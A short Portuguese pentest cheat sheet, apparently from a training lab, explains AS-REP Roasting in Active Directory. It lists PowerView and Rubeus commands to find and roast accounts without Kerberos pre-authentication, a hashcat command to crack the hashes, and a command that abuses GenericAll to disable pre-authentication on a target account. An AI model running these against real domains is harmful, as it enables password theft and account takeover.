ASREPRoasting

Descrição

A tática principal num ataque AS-REP Roasting consiste em ter a pré-autenticação Kerberos desactivada. Nesse cenário, um atacante não precisa da palavra-passe do utilizador para obter uma resposta de autenticação(Figura 1). Quando o atacante tem a resposta, pode tentar decifrá-la offline para obter a palavra-passe em texto simples do utilizador.

Enumeração

  • Enumeração de contas do PowerShell com DONT_REQ_PREAUTH

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
  • Também podemos usar Rubeus.exe asreproast /format:hashcatpara enumerar todas as contas com o sinalizador DONT_REQ_PREAUTH.

.\Rubeus.exe asreproast /format:hashcat /nowrap

Executando o Ataque

PS C:\Tools> .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt

Hash Cracking

C:\Tools\hashcat-6.2.6> hashcat.exe -m 18200 C:\Tools\hashes.txt C:\Tools\rockyou.txt -O

Definir DONT_REQ_PREAUTH com PowerView

  • Se descobrirmos que temos GenericAllprivilégios em uma conta, em vez de redefinir a senha, podemos habilitar o DONT_REQ_PREAUTHsinalizador para fazer uma solicitação para obter o hash dessa conta e tentar quebrá-la.

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

Last updated